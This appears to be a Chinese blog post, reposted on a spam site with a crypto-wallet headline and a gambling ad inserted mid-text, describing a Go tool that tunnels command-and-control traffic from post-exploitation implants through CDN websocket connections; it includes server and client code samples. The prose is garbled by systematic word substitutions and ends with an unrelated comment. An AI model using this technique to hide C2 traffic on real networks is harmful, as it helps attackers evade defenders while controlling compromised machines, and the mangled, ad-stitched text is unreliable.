欢迎访问本站!

首页科技正文

usdt钱包(caibao.it):一款使用主流CDN实现流量封装的工具

admin2020-12-2698安全技术安全工具

靠山

隐藏C2流量更好的方式就是把C2的通讯伪装成常见的正当通讯。在控制好poll频率的情况下,将C2通讯封装成与CDN通讯的TLS流量可以说是很难引起注重了。

主流如Cloudflare和腾讯云的CDN,都支持websocket和HTTP2的署理。我们行使其中随便一种协议都能实现一个全双工的可被CDN署理的C2通讯隧道。不外鉴于websocket应用加倍普遍,这里就直接使用golang尺度库的websocket来实现我们的流量封装工具。

昨天下午写出了能用的版本,我小我私家的需求是把它作为一个扩展库给我另外一个linux后渗透工具使用,以是没有实现完整的socks5署理功效,而是仅仅将署理的毗邻与目的C2对接上,能实现C2的正常事情。

架构

整体的结构类似于这样:

usdt钱包(caibao.it):一款使用主流CDN实现流量封装的工具 安全技术 安全工具 第1张

其中,我们需要写的就是socks5署理和websocket server了。

socks5署理主要卖力socks5协议实现,它与websocket服务器确立一个TLS封装的websocket毗邻,然后将被署理的TCP毗邻对接到这个websocket毗邻上。

websocket毗邻透过CDN,然后可能还透过Nginx,最后到达websocket服务器。

,

Allbet *** _ALLbet6.com

欢迎进入Allbet *** (Allbet Game):www.aLLbetgame.us,欧博官网是欧博集团的官方网站。欧博官网开放Allbet注册、Allbe *** 、Allbet电脑客户端、Allbet手机版下载等业务。

,

websocket服务器会与C2目的确立一个TCP毗邻,并将接到的客户端毗邻对接上去。至此,C2乐成接到了受控端的毗邻,确立起C2通讯。

使用

我推荐在linux上的用户直接使用我的linux后渗透工具,这样只需指定命令行参数即可无痛使用CDN署理C2。

其它场景下,go项目可以参照如下代码示例来挪用:

server端

package main

import (
    "log"

    cdn2proxy "github.com/jm33-m0/go-cdn2proxy"
)

func main() {
    err := cdn2proxy.StartServer("9000", "127.0.0.1:8000", os.Stderr)
    if err != nil {
        log.Fatal(err)
    }
}

客户端

package main

import (
    "log"

    cdn2proxy "github.com/jm33-m0/go-cdn2proxy"
)

func main() {
    err := cdn2proxy.StartProxy("127.0.0.1:10888", "wss://example.com/ws", "https://9.9.9.9/dns-query")
    if err != nil {
        log.Fatal(err)
    }
}

若是你不用golang,可以直接将以上两个示例修改后编译,作为二进制程序配合你的C2使用。

演示

usdt钱包(caibao.it):一款使用主流CDN实现流量封装的工具 安全技术 安全工具 第2张

usdt钱包(caibao.it):一款使用主流CDN实现流量封装的工具 安全技术 安全工具 第3张

网友评论

1条评论
  • 2021-01-09 00:11:59

    Beyond Meat新款植物肉更以味道吸引消费者,借此增添植物肉的「真实性」,同时也能以人造肉更康健作为主打特色,预计会在2021年头先在美国市场销售。真是很特别,爱了